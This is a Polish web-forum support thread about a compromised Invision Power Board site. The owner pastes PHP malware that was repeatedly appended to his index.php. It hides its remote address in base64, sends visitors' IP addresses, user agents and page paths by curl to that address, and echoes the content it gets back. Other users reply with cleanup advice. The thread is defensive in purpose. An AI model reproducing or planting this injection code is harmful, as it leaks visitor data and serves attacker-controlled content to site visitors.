Skocz do zawartości
"Idzie nowe..." - o zmianach i nie tylko ×
Przeniesienie zakupów z IPS Marketplace / Moving bought items from IPS Marketplace ×

ROZWIĄZANY: Cannot modify header information


manius1988

Rekomendowane odpowiedzi

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/admin/sources/classes/output/formats/html/htmlOutput.php on line 110

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/admin/sources/classes/output/formats/html/htmlOutput.php on line 127

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/admin/sources/classes/output/formats/html/htmlOutput.php on line 136

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/admin/sources/classes/output/formats/html/htmlOutput.php on line 137

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/admin/sources/classes/output/formats/html/htmlOutput.php on line 141

Co zrobić??

Odnośnik do komentarza
Udostępnij na innych stronach

Oj powiem Ci że chyba ten tryb nie był włączony... chodzi o to że jak mam włączony antywirusa i wchodzę na swoją stronę przez Mozilla to blokuje strone a przez chrome normalnie a gdy wyłacze antywirusa strona sie wczyta normalnie tylko ze to nadal jest w u góry a w sb mam

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 318

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 325

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 326

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 327

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 318

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 325

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 326

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 327

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 318

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 325

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 326

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 327

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 318

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 325

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 326

Warning: Cannot modify header information - headers already sent by (output started at /home/nz146289/public_html/index.php:22) in /home/nz146289/public_html/ips_kernel/classAjax.php on line 327

Dodam że jak wchodzę przez www.csone.eu to mam ten błąd a jak wchodzę przez csone.eu to mam na headerze ten błąd i w sb jak wyżej pisałem

Edytowane przez manius1988
Odnośnik do komentarza
Udostępnij na innych stronach

To jest jak by wirus czy coś bo do pliku index.php automatycznie dopisuje coś takiego:

if (!isset($sRetry))

{

global $sRetry;

$sRetry = 1;

// This code use for global bot statistic

$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot

$stCurlHandle = NULL;

$stCurlLink = "";

if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes

{

if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics

$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

$stCurlHandle = curl_init( $stCurlLink );

}

}

if ( $stCurlHandle !== NULL )

{

curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);

$sResult = @curl_exec($stCurlHandle);

if ($sResult[0]=="O")

{$sResult[0]=" ";

echo $sResult; // Statistic code end }

}

curl_close($stCurlHandle);

}

}

wgram świeże pliki index.php to forum śmiga a jak co jakiś czas to się dopisze forum znów wywala ten błąd, co to może być???

Edytowane przez manius1988
Odnośnik do komentarza
Udostępnij na innych stronach

to jak to naprawić dodam że jak wchodzę na stronę antywirus mi się włącza i mam np coś takiego zmienia się tam tylko strona"obiekt" jak coś znów dopisze do pliku index.php to i adres"obiekt" tam się zmiana:

post-13003-0-49133700-1331417069.jpg

Edytowane przez manius1988
Odnośnik do komentarza
Udostępnij na innych stronach

1) Wywal TC

2) Zmień hasło do FTP i nie zapisuj go w programach FTP

3) Przeskanuj swój komputer

4) Sprawdź wszystkie index.php / index.html ( jak masz świeżą stronę / forum to najlepiej podmień [a jeszcze lepiej wykasuj wszystko z ftp i od nowa o ile to możliwe])

5) Powodzenia

Kiedyś miałem podobna sytuacje jak Ty.

Znajdź na FTP jakiś "zarażony" plik i sprawdź datę i czas jego modyfikacji i pisz do admina serwera o logi z tego dnia i niech banuje to IP* (upewnij się że to nie Twoje IP)

Jak ja z tym "walczyłem" to nie mogłem wykasować wszystkiego z FTP ale po dłuższym czasie "wygrałem" z tym ustrojstwem ;)

* Zapewne robak będzie miał zmienne IP lub dużą pulę adresów, no ale cóż zawsze to coś ;)

PS . W moim przypadku "wirus" doklejał do plików typu : index.php , index.html , .js

pre_1383606035__stonefly2.gif

Odnośnik do komentarza
Udostępnij na innych stronach

  • Manager

Problem ROZWIĄZANY. Jeśli są jakiekolwiek wątpliwości, pytania proszę o założenie nowego tematu.

Wszelkie uzasadnione reklamacje/pretensje/sugestie/rady przyjmuje ekipa forum.

intermedia - profesjonalne rozwiązania Invision Power Board

---

Chcesz uzyskać szybko i sprawnie pomoc? Uzupełnij wersję i adres w profilu.

Odnośnik do komentarza
Udostępnij na innych stronach

Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę.